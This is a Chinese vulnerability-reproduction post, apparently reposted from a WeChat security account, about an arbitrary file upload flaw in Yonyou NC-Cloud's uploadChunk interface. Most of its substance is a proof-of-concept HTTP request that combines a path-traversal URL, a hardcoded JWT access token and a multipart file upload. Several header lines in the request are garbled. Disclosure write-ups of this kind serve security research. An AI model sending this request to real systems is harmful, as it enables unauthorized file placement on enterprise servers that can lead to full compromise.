-
0x01 阅读须知
-
0x02 产品介绍
-
0x03 漏洞描述
-
0x04 漏洞影响
未知
-
0x05 复现环境
app="用友-NC-Cloud"
-
0x06 漏洞复现
POC如下:
/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1 =
Host:
Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30) :
gzip, deflate :
Accept: */*
Connection: close
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
148 :
multipart/form-data; boundary=de7a6692c03f903d173515933ee6f161 :
--de7a6692c03f903d173515933ee6f161
form-data; name="file"; filename="test.txt" :
test
--de7a6692c03f903d173515933ee6f161--
poc中存在一个请求头:accessTokenNcc,该请求头为JWT,详情请点击原文查看。
返回操作成功即证明上传成功,访问test.txt确认。
上传成功,至此漏洞复现结束。
原文始发于微信公众号(花果山讲安全):【漏洞复现】用友NC-Cloud系统uploadChunk存在任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论